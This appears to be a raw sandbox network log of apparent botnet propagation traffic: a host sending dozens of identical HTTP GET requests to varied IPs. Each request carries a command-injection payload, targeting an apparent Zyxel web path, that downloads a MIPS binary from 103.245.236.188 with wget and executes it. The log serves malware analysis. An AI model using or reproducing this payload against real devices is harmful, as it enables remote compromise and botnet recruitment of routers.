                                                Jan 12, 2024 18:16:18.332540989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3316192.168.2.2356736155.237.6.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.332577944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3317192.168.2.236099242.179.102.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.332612038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3318192.168.2.2348204172.13.108.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.332679033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3319192.168.2.233522478.61.100.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.332707882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3320192.168.2.2333482186.12.224.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.332750082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3321192.168.2.2344564142.23.132.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.332787037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3322192.168.2.235930861.103.165.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.332822084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3323192.168.2.2360144161.110.203.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.332860947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3324192.168.2.2339280116.22.44.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.332914114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3325192.168.2.235237860.144.94.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.332954884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3326192.168.2.235159040.109.89.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.332989931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3327192.168.2.2337310117.14.113.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.333008051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3328192.168.2.234080651.99.24.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.333064079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3329192.168.2.2338502107.138.37.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.333102942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3330192.168.2.2348672156.190.129.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.333138943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3331192.168.2.236002836.70.177.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.333184958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3332192.168.2.233484493.55.116.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.333224058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3333192.168.2.23517681.254.132.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.333249092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3334192.168.2.2352656162.203.19.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.333287001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3335192.168.2.2351060188.81.63.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.333340883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3336192.168.2.235711873.62.5.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.333355904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3337192.168.2.2348482197.205.160.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.333405018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3338192.168.2.2355212192.227.201.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.333430052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3339192.168.2.2348834136.225.222.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.333482981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3340192.168.2.233777648.187.182.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.333530903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3341192.168.2.234430247.226.27.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.333570957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3342192.168.2.2340968220.211.49.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.333604097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3343192.168.2.2347772190.113.106.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.333652973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3344192.168.2.2337278117.109.52.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.333690882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3345192.168.2.2339226122.196.186.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.333725929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3346192.168.2.2343516186.7.95.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.333777905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3347192.168.2.2360042167.216.181.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.333827019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3348192.168.2.2340196198.225.50.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.333842039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3349192.168.2.2334440208.85.171.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.333904982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3350192.168.2.2342984102.156.98.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.333923101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3351192.168.2.234827453.27.30.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.333980083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3352192.168.2.233365066.78.255.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.334016085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3353192.168.2.2348596148.98.155.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.334045887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3354192.168.2.2360654119.178.43.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.334103107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3355192.168.2.2333676124.247.165.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.334130049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3356192.168.2.2349666157.172.156.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.334163904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3357192.168.2.2339416125.116.247.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.334211111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3358192.168.2.2347928184.105.221.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.334240913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3359192.168.2.2333954192.0.147.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.334295988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3360192.168.2.2349932141.28.169.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.334321022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3361192.168.2.2351970121.149.57.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.334369898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3362192.168.2.234252295.124.241.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.334425926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3363192.168.2.2357584150.99.164.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.334464073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3364192.168.2.234559299.167.86.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.334510088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3365192.168.2.2358302155.104.76.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.334538937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3366192.168.2.233439099.69.85.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.334567070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3367192.168.2.2342530182.183.174.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.334608078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3368192.168.2.2344736104.237.141.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.334656954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3369192.168.2.234811490.107.122.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.334702969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3370192.168.2.234064431.75.107.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.334747076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3371192.168.2.233647496.204.165.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.334758997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3372192.168.2.2341570158.175.229.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.334805965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3373192.168.2.234431487.3.30.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.334860086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3374192.168.2.235792623.44.219.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.334902048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3375192.168.2.234111827.190.52.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.338185072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3376192.168.2.234654293.153.234.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.338757038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3377192.168.2.2335268172.35.72.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.338784933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3378192.168.2.2338070156.171.209.58443
                                                TimestampBytes transferredDirectionData
